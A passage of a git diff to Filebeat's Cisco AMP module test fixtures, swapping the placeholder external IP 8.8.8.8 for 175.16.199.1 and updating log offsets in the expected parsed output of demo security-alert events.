+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json index 32a9295d083f..6902f74ba521 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json @@ -3,7 +3,7 @@ "@timestamp": "2021-01-14T10:33:46.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -54,7 +54,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -66,7 +66,7 @@ "@timestamp": "2021-01-14T10:15:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -92,13 +92,13 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 1358, + "log.offset": 1363, "related.hosts": [ "Demo_AMP_Threat_Quarantined" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -110,7 +110,7 @@ "@timestamp": "2021-01-14T10:06:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -151,7 +151,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 2295, + "log.offset": 2305, "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", @@ -167,7 +167,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -183,7 +183,7 @@ "@timestamp": "2021-01-14T10:06:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -215,7 +215,7 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 3885, + "log.offset": 3900, "related.hash": [ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], @@ -224,7 +224,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -236,7 +236,7 @@ "@timestamp": "2021-01-14T10:05:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -270,7 +270,7 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 5008, + "log.offset": 5028, "related.hash": [ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], @@ -279,7 +279,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -291,7 +291,7 @@ "@timestamp": "2021-01-14T10:05:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -332,7 +332,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 6204, + "log.offset": 6229, "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", @@ -348,7 +348,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -364,7 +364,7 @@ "@timestamp": "2021-01-14T10:05:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -403,7 +403,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 7800, + "log.offset": 7830, "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", @@ -417,7 +417,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -433,7 +433,7 @@ "@timestamp": "2021-01-14T10:05:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -465,7 +465,7 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 9301, + "log.offset": 9336, "related.hash": [ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], @@ -474,7 +474,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -488,7 +488,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -523,7 +523,7 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 10424, + "log.offset": 10464, "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" 
@@ -533,7 +533,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -547,7 +547,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -582,7 +582,7 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 12096, + "log.offset": 12141, "process.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", "related.hash": [ "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" @@ -592,7 +592,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -606,7 +606,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -641,7 +641,7 @@ "host.hostname": "Demo_AMP_Threat_Quarantined", "host.name": "Demo_AMP_Threat_Quarantined", "input.type": "log", - "log.offset": 14294, + "log.offset": 14344, "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" @@ -651,7 +651,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -665,7 +665,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -700,7 +700,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 16006, + "log.offset": 16061, "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", "related.hash": [ "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" @@ -710,7 +710,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -724,7 +724,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -759,7 +759,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 17775, + "log.offset": 17835, "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", "related.hash": [ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" @@ -769,7 +769,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -783,7 +783,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -819,7 +819,7 @@ "host.hostname": "Demo_Low_Prev_Retro", "host.name": "Demo_Low_Prev_Retro", "input.type": "log", - "log.offset": 19558, + "log.offset": 19623, "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", "related.hash": [ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" @@ -829,7 +829,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -841,7 +841,7 @@ "@timestamp": "2021-01-14T10:01:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -872,7 +872,7 @@ "host.hostname": "Demo_BP_WMIPRVSE", "host.name": "Demo_BP_WMIPRVSE", "input.type": "log", - "log.offset": 21167, + "log.offset": 21237, "related.hash": [ "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" ], @@ -881,7 +881,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -893,7 +893,7 @@ "@timestamp": "2021-01-14T10:01:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -931,7 +931,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 27082, + "log.offset": 27177, "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1", "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e", "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", @@ -945,7 +945,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -963,7 +963,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -998,7 +998,7 @@ "host.hostname": "Demo_AMP_MAP_FriedEx", "host.name": "Demo_AMP_MAP_FriedEx", "input.type": "log", - "log.offset": 28604, + "log.offset": 28704, "process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", "related.hash": [ "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" @@ -1008,7 +1008,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1020,7 +1020,7 @@ "@timestamp": "2021-01-14T07:56:40.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1058,7 +1058,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 30050, + "log.offset": 30155, "related.hash": [ "41476df3138717868118d8542cf3d1d6", "5ca4bef8de6def53519d4b22632675bb4c1e470b", @@ -1069,7 +1069,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1083,7 +1083,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1118,7 +1118,7 @@ "host.hostname": "Demo_AMP_MAP_FriedEx", "host.name": "Demo_AMP_MAP_FriedEx", "input.type": "log", - "log.offset": 31276, + "log.offset": 31386, "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", "related.hash": [ "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" @@ -1128,7 +1128,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1140,7 +1140,7 @@ "@timestamp": "2021-01-14T00:37:44.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1173,7 +1173,7 @@ "host.hostname": "Demo_AMP", "host.name": "Demo_AMP", "input.type": "log", - "log.offset": 33023, + "log.offset": 33138, "related.hash": [ "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" ], @@ -1182,7 +1182,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1194,7 +1194,7 @@ "@timestamp": "2021-01-14T00:27:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1232,7 +1232,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 34132, + "log.offset": 34252, "related.hash": [ "41476df3138717868118d8542cf3d1d6", "5ca4bef8de6def53519d4b22632675bb4c1e470b", @@ -1243,7 +1243,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1255,7 +1255,7 @@ "@timestamp": "2021-01-14T00:02:08.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1281,13 +1281,13 @@ "host.hostname": "Demo_AMP_MAP_FriedEx", "host.name": "Demo_AMP_MAP_FriedEx", "input.type": "log", - "log.offset": 35358, + "log.offset": 35483, "related.hosts": [ "Demo_AMP_MAP_FriedEx" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1299,7 +1299,7 @@ "@timestamp": "2021-01-13T15:36:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1333,7 +1333,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 36288, + "log.offset": 36418, "related.hash": [ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], @@ -1342,7 +1342,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1354,7 +1354,7 @@ "@timestamp": "2021-01-13T15:36:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1386,7 +1386,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 37489, + "log.offset": 37624, "related.hash": [ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], @@ -1395,7 +1395,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1407,7 +1407,7 @@ "@timestamp": "2021-01-13T15:36:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1445,7 +1445,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 38602, + "log.offset": 38742, "related.hash": [ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], @@ -1454,7 +1454,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1466,7 +1466,7 @@ "@timestamp": "2021-01-13T15:36:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1506,7 +1506,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 39856, + "log.offset": 40001, "related.hash": [ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", "5faebef3bb880489195e80e6656ccf442ff7123b", 
@@ -1517,7 +1517,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1529,7 +1529,7 @@ "@timestamp": "2021-01-13T10:37:33.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1659,7 +1659,7 @@ "host.hostname": "Demo_AMP", "host.name": "Demo_AMP", "input.type": "log", - "log.offset": 41214, + "log.offset": 41364, "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", "related.hash": [ "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" @@ -1669,7 +1669,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1681,7 +1681,7 @@ "@timestamp": "2021-01-13T10:23:35.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1707,13 +1707,13 @@ "host.hostname": "Demo_AMP", "host.name": "Demo_AMP", "input.type": "log", - "log.offset": 44193, + "log.offset": 44348, "related.hosts": [ "Demo_AMP" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1727,7 +1727,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1762,7 +1762,7 @@ "host.hostname": "Demo_AMP", "host.name": "Demo_AMP", "input.type": "log", - "log.offset": 45111, + "log.offset": 45271, "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", "related.hash": [ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" @@ -1772,7 +1772,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1786,7 +1786,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1821,7 +1821,7 @@ "host.hostname": "Demo_AMP", "host.name": "Demo_AMP", "input.type": "log", - "log.offset": 46862, + "log.offset": 47027, "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", "related.hash": [ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" @@ -1831,7 +1831,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1843,7 +1843,7 @@ "@timestamp": "2021-01-13T10:00:07.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1875,7 +1875,7 @@ "host.hostname": "Demo_AMP", "host.name": "Demo_AMP", "input.type": "log", - "log.offset": 48509, + "log.offset": 48679, "related.hash": [ "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" ], @@ -1884,7 +1884,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1898,7 +1898,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1933,7 +1933,7 @@ "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", "host.name": "Demo_AMP_Exploit_Prevention_Audit", "input.type": "log", - "log.offset": 49613, + "log.offset": 49788, "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", "related.hash": [ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" @@ -1943,7 +1943,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1955,7 +1955,7 @@ "@timestamp": "2021-01-12T10:15:22.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1981,13 +1981,13 @@ "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", "host.name": "Demo_AMP_Exploit_Prevention_Audit", "input.type": "log", - "log.offset": 51389, + "log.offset": 51569, "related.hosts": [ "Demo_AMP_Exploit_Prevention_Audit" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1999,7 +1999,7 @@ "@timestamp": "2020-12-25T05:49:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2040,7 +2040,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 52332, + "log.offset": 52517, "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba", "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", @@ -2056,7 +2056,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2072,7 +2072,7 @@ "@timestamp": "2020-12-25T05:49:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2104,7 +2104,7 @@ "host.hostname": "Demo_AMP_Intel", "host.name": "Demo_AMP_Intel", "input.type": "log", - "log.offset": 53947, + "log.offset": 54137, "related.hash": [ "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" ], @@ -2113,7 +2113,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2125,7 +2125,7 @@ "@timestamp": "2020-12-25T05:30:44.000Z", "cisco.amp.computer.active": true, 